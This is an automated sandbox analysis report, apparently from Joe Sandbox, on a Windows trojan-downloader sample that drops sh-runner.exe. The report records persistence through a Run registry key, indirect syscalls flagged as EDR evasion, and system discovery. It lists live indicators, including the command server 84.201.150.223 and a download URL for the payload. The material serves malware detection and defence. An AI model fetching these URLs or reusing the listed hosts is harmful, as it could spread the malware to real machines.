      Source: C:\ProgramData\sh-runner.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: cryptnet.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: webio.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: samcli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: userenv.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: wininet.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: wldp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: profapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: netutils.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: schannel.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: samcli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: webio.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: userenv.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: wininet.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: wldp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: profapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: netutils.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: schannel.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: samcli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\ProgramData\sh-runner.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: .xdata
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: /4
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: /19
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: /31
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: /45
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: /57
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: /70
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: /81
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: /97
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeStatic PE information: section name: /113
      Source: sh-runner[1].exe.0.drStatic PE information: section name: .xdata
      Source: sh-runner.exe.0.drStatic PE information: section name: .xdata
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F88AF3 push 2F672291h; retf 2_3_000001FF24F88B32
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F82D0B push ds; ret 2_3_000001FF24F82D0E
      Source: C:\ProgramData\sh-runner.exeCode function: 2_3_000001FF24F751C3 push FF00009Eh; ret 2_3_000001FF24F751C8
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD6D253 push B7D19979h; retf 2_2_00007FF72BD6D259
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF22F9058E push ds; retf 2_2_000001FF22F90590
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF22F90804 push ecx; ret 2_2_000001FF22F90B32
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24F947C4 push FF00009Eh; ret 2_2_000001FF24F947C9
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24FA230C push ds; ret 2_2_000001FF24FA230F
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF6A2D0B push ds; ret 4_3_00000112CF6A2D0E
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF6951C3 push FF00009Eh; ret 4_3_00000112CF6951C8
      Source: C:\ProgramData\sh-runner.exeCode function: 4_3_00000112CF6A8AF3 push 2F672291h; retf 4_3_00000112CF6A8B32
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF4C058E push ds; retf 4_2_00000112CF4C0590
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF4C0804 push ecx; ret 4_2_00000112CF4C0B32
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6C230C push ds; ret 4_2_00000112CF6C230F
      Source: C:\ProgramData\sh-runner.exeCode function: 4_2_00000112CF6B47C4 push FF00009Eh; ret 4_2_00000112CF6B47C9
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE552D0B push ds; ret 9_3_00000184BE552D0E
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE5451C3 push FF00009Eh; ret 9_3_00000184BE5451C8
      Source: C:\ProgramData\sh-runner.exeCode function: 9_3_00000184BE558AF3 push 2F672291h; retf 9_3_00000184BE558B32
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE2A0804 push ecx; ret 9_2_00000184BE2A0B32
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE2A058E push ds; retf 9_2_00000184BE2A0590
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE57230C push ds; ret 9_2_00000184BE57230F
      Source: C:\ProgramData\sh-runner.exeCode function: 9_2_00000184BE5647C4 push FF00009Eh; ret 9_2_00000184BE5647C9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exeJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeFile created: C:\ProgramData\sh-runner.exeJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeFile created: C:\ProgramData\sh-runner.exeJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyProgramJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyProgramJump to behavior
      Source: C:\ProgramData\sh-runner.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\ProgramData\sh-runner.exeCode function: GetUserNameA,GetComputerNameExA,GetComputerNameExA,GetAdaptersInfo,GetAdaptersInfo,2_2_000001FF24F97D70
      Source: C:\ProgramData\sh-runner.exeCode function: GetUserNameA,GetComputerNameExA,GetComputerNameExA,GetAdaptersInfo,GetAdaptersInfo,4_2_00000112CF6B7D70
      Source: C:\ProgramData\sh-runner.exeCode function: GetUserNameA,GetComputerNameExA,GetComputerNameExA,GetAdaptersInfo,GetAdaptersInfo,9_2_00000184BE567D70
      Source: C:\ProgramData\sh-runner.exeAPI coverage: 1.4 %
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD10EA0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,2_2_00007FF72BD10EA0
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
      Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
      Source: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E52000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E0C000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000002.00000002.3055231601.000001FF22FFA000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000002.3055154442.00000112CF5A5000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: sh-runner.exe, 00000004.00000002.3055154442.00000112CF5A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
      Source: sh-runner.exe, 00000002.00000002.3055231601.000001FF22FFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24F9D510 LdrGetProcedureAddress,2_2_000001FF24F9D510
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD0C420 IsDebuggerPresent,2_2_00007FF72BD0C420
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD1F1B0 GetProcessHeap,HeapAlloc,HeapAlloc,2_2_00007FF72BD1F1B0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeCode function: 0_2_00007FF71C8C1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,0_2_00007FF71C8C1180
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeCode function: 0_2_00007FF71C8C8011 SetUnhandledExceptionFilter,0_2_00007FF71C8C8011
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeCode function: 0_2_00007FF71C8CE2C8 SetUnhandledExceptionFilter,0_2_00007FF71C8CE2C8
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BCD1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,2_2_00007FF72BCD1180
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BDA5938 SetUnhandledExceptionFilter,Sleep,2_2_00007FF72BDA5938
      Source: C:\ProgramData\sh-runner.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\ProgramData\sh-runner.exeNtCreateThreadEx: Indirect: 0x1FF24FA37EAJump to behavior
      Source: C:\ProgramData\sh-runner.exeNtCreateThreadEx: Indirect: 0x112CF6C37EAJump to behavior
      Source: C:\ProgramData\sh-runner.exeNtTerminateThread: Indirect: 0x184BE57490DJump to behavior
      Source: C:\ProgramData\sh-runner.exeNtQueryInformationProcess: Indirect: 0x112CF6C3F7FJump to behavior
      Source: C:\ProgramData\sh-runner.exeNtTerminateThread: Indirect: 0x1FF24FA490DJump to behavior
      Source: C:\ProgramData\sh-runner.exeNtQueueApcThread: Indirect: 0x184BE5743A1Jump to behavior
      Source: C:\ProgramData\sh-runner.exeNtQueueApcThread: Indirect: 0x1FF24FA43A1Jump to behavior
      Source: C:\ProgramData\sh-runner.exeNtQueueApcThread: Indirect: 0x112CF6C43A1Jump to behavior
      Source: C:\ProgramData\sh-runner.exeNtTerminateThread: Indirect: 0x112CF6C490DJump to behavior
      Source: C:\ProgramData\sh-runner.exeNtCreateThreadEx: Indirect: 0x184BE5737EAJump to behavior
      Source: C:\ProgramData\sh-runner.exeNtQueryInformationProcess: Indirect: 0x184BE573F7FJump to behavior
      Source: C:\ProgramData\sh-runner.exeNtQueryInformationProcess: Indirect: 0x1FF24FA3F7FJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exeProcess created: C:\ProgramData\sh-runner.exe "C:\ProgramData\sh-runner.exe" Jump to behavior
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD0B2C0 GetSystemTimePreciseAsFileTime,2_2_00007FF72BD0B2C0
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_000001FF24F97D70 GetUserNameA,GetComputerNameExA,GetComputerNameExA,GetAdaptersInfo,GetAdaptersInfo,2_2_000001FF24F97D70
      Source: C:\ProgramData\sh-runner.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.3055112919.00000112CF4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD22A06 bind,listen,WSAGetLastError,closesocket,2_2_00007FF72BD22A06
      Source: C:\ProgramData\sh-runner.exeCode function: 2_2_00007FF72BD22D7C bind,WSAGetLastError,closesocket,2_2_00007FF72BD22D7C
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Registry Run Keys / Startup Folder
      11
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Abuse Elevation Control Mechanism
      1
      Disable or Modify Tools
      LSASS Memory1
      Query Registry
      Remote Desktop ProtocolData from Removable Media1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Registry Run Keys / Startup Folder
      11
      Process Injection
      Security Account Manager121
      Security Software Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      NTDS1
      Process Discovery
      Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Abuse Elevation Control Mechanism
      LSA Secrets1
      Account Discovery
      SSHKeylogging113
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
      Obfuscated Files or Information
      Cached Domain Credentials1
      System Owner/User Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync1
      System Network Configuration Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
      File and Directory Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow3
      System Information Discovery
      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1521496 Sample: SecuriteInfo.com.Win32.Troj... Startdate: 28/09/2024 Architecture: WINDOWS Score: 96 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for dropped file 2->41 43 5 other signatures 2->43 7 SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe 1 16 2->7         started        11 sh-runner.exe 1 2->11         started        14 sh-runner.exe 1 2->14         started        process3 dnsIp4 31 84.201.150.223, 443, 49730, 49731 YANDEXCLOUDRU Russian Federation 7->31 27 C:\Users\user\AppData\...\sh-runner[1].exe, PE32+ 7->27 dropped 29 C:\ProgramData\sh-runner.exe, PE32+ 7->29 dropped 16 sh-runner.exe 1 7->16         started        19 conhost.exe 7->19         started        45 Found direct / indirect Syscall (likely to bypass EDR) 11->45 21 conhost.exe 11->21         started        23 conhost.exe 14->23         started        file5 signatures6 process7 signatures8 33 Multi AV Scanner detection for dropped file 16->33 35 Found direct / indirect Syscall (likely to bypass EDR) 16->35 25 conhost.exe 16->25         started        process9

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe39%ReversingLabs
      SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\ProgramData\sh-runner.exe39%ReversingLabsWin64.Exploit.Marte
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exe39%ReversingLabsWin64.Exploit.Marte
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      windowsupdatebg.s.llnwi.net
      41.63.96.128
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://84.201.150.223/true
          unknown
          http://84.201.150.223/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaCs5JSqzLx8SmijRwWz3ygEPuzWbwlW2dF8RGznIQHPzsqj8true
            unknown
            http://84.201.150.223/sh-runner.exetrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://84.201.150.223/E8sh-runner.exe, 00000002.00000002.3055839319.000001FF24CE3000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://84.201.150.223/sh-runner.exeSavingSecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exefalse
                  unknown
                  https://84.201.150.223/-sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://84.201.150.223/ssh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://84.201.150.223:443/gsh-runner.exe, 00000009.00000002.3055151540.00000184BE3BA000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://84.201.150.223/psh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://84.201.150.223/qsh-runner.exe, 00000009.00000002.3055151540.00000184BE328000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://84.201.150.223/4sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://84.201.150.223/ush-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://84.201.150.223/xsh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://84.201.150.223/ysh-runner.exe, 00000004.00000002.3055154442.00000112CF5D5000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://84.201.150.223/;~sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://84.201.150.223:443/vsh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://84.201.150.223/g(sh-runner.exe, 00000002.00000003.2225218332.000001FF24CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://84.201.150.223:443/sh-runner.exe, 00000004.00000002.3055154442.00000112CF630000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://84.201.150.223/?9sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://84.201.150.223//9sh-runner.exe, 00000002.00000002.3055231601.000001FF22FAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://84.201.150.223:8443/blog.html/jBIvhv7O-Lnyc_NxlIGNkA2eqPXwyH2tWFMqE9rGON6m5Me7qKHLtXFrX71OaCsh-runner.exe, 00000009.00000002.3055151540.00000184BE2D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://84.201.150.223:443/Psh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://84.201.150.223/Xsh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://84.201.150.223/Ysh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://84.201.150.223/=sh-runner.exe, 00000004.00000002.3055154442.00000112CF558000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://84.201.150.223:443/Xsh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000003.2301836654.00000112CF60C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://84.201.150.223/7Vsh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
